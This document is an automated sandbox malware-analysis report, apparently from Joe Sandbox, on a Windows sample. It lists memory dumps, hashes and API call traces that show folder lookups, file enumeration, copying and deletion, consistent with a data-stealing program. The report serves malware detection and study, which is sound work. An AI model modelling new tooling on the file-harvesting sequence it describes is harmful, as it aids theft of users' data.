                                      • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                      • Instruction ID: 4fd070df657e783b884225b2a5951a48bf79ebecb6b39e0e70a0948874268dcf
                                      • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                      • Instruction Fuzzy Hash: C8F05878A84629EFEB10ABE0EC0ABBD7675EB45741F201A18F502A59D8CBB44500CA66
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: `o@
                                      • API String ID: 0-590292170
                                      • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                      • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                      • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                      • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                      APIs
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                      • lstrcatA.KERNEL32(?,009DBAE0), ref: 00414C08
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                        • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                        • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                        • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                        • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,009DC808,?,000003E8), ref: 00414A4A
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                        • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                        • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: UaA
                                      • API String ID: 2104210347-3893042857
                                      • Opcode ID: 2cac0148d2110f3df46bb078800b33f8f0db55810685f274a968c650ce667207
                                      • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                      • Opcode Fuzzy Hash: 2cac0148d2110f3df46bb078800b33f8f0db55810685f274a968c650ce667207
                                      • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • GetSystemTime.KERNEL32(?,009D6878,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: SystemTimelstrcpy
                                      • String ID: cI@$cI@
                                      • API String ID: 62757014-1697673767
                                      • Opcode ID: 270aac1f6b61675edb1843e8a635b5515c73b826a4035c958f1de1623f3f8d38
                                      • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                      • Opcode Fuzzy Hash: 270aac1f6b61675edb1843e8a635b5515c73b826a4035c958f1de1623f3f8d38
                                      • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                      APIs
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                      • lstrcatA.KERNEL32(?,009DAC58), ref: 004150A8
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                        • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                      • String ID: aA
                                      • API String ID: 2699682494-2567749500
                                      • Opcode ID: 7d8f81950f29c353dc6eca79efceced1e8debec432d06c8626770cf998b7186f
                                      • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                      • Opcode Fuzzy Hash: 7d8f81950f29c353dc6eca79efceced1e8debec432d06c8626770cf998b7186f
                                      • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                      APIs
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                        • Part of subcall function 0092AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0092AC2C
                                        • Part of subcall function 0092AC17: lstrcpy.KERNEL32(00000000), ref: 0092AC6B
                                        • Part of subcall function 0092AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0092AC79
                                        • Part of subcall function 0092AB87: lstrcpy.KERNEL32(00000000,?), ref: 0092ABD9
                                        • Part of subcall function 0092AB87: lstrcat.KERNEL32(00000000), ref: 0092ABE9
                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                        • Part of subcall function 0092AA07: lstrcpy.KERNEL32(?,00000000), ref: 0092AA4D
                                        • Part of subcall function 0091A077: memcmp.MSVCRT(?,00421264,00000003), ref: 0091A094
                                      • lstrlen.KERNEL32(00000000), ref: 0091BF06
                                        • Part of subcall function 00929097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009290B9
                                      • StrStrA.SHLWAPI(00000000,004213E0), ref: 0091BF34
                                      • lstrlen.KERNEL32(00000000), ref: 0091C00C
                                      • lstrlen.KERNEL32(00000000), ref: 0091C020
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                      • String ID:
                                      • API String ID: 1440504306-0
                                      • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                      • Instruction ID: 42bddb4b57a51a9430b91744222acc07ceb0e60fa676f88eb3875e63f5ff0e31
                                      • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                      • Instruction Fuzzy Hash: 15B10076910228EBCF14EBA0ED96FED733AAF94700F404169F50662595EF345B48CF62
                                      APIs
                                      • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                      • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                      • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                      • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$CloseFileNextlstrcat
                                      • String ID: !=A
                                      • API String ID: 3840410801-2919091325
                                      • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                      • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                      • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                      • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                      APIs
                                        • Part of subcall function 00929047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00929072
                                      • lstrcat.KERNEL32(?,00000000), ref: 009251E1
                                      • lstrcat.KERNEL32(?,00421070), ref: 009251FE
                                      • lstrcat.KERNEL32(?,0064A5F8), ref: 00925212
                                      • lstrcat.KERNEL32(?,00421074), ref: 00925224
                                        • Part of subcall function 00924B77: wsprintfA.USER32 ref: 00924B93
                                        • Part of subcall function 00924B77: FindFirstFileA.KERNEL32(?,?), ref: 00924BAA
                                        • Part of subcall function 00924B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00924BD8
                                        • Part of subcall function 00924B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00924BEE
                                        • Part of subcall function 00924B77: FindNextFileA.KERNEL32(000000FF,?), ref: 00924DE4
                                        • Part of subcall function 00924B77: FindClose.KERNEL32(000000FF), ref: 00924DF9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                      • String ID:
                                      • API String ID: 2667927680-0
                                      • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                      • Instruction ID: ee8839d556ccb317b3445c92c02ce4e59eb677f9dba21139655779b78719aa5d
                                      • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                      • Instruction Fuzzy Hash: F021C87AA40218BBC714FBF0EC46FED737DAB95300F404188B64592185DE7496C9CBA2
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID:
                                      • API String ID: 1206339513-0
                                      • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                      • Instruction ID: 5929183259c6f32de6f60226acaca774d7336700a4a944a9fc693f814b2baa1e
                                      • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                      • Instruction Fuzzy Hash: F5011A79640108FFCB04DFECD988EAE7BBAEF49394F108148F9098B304C635AA40DB95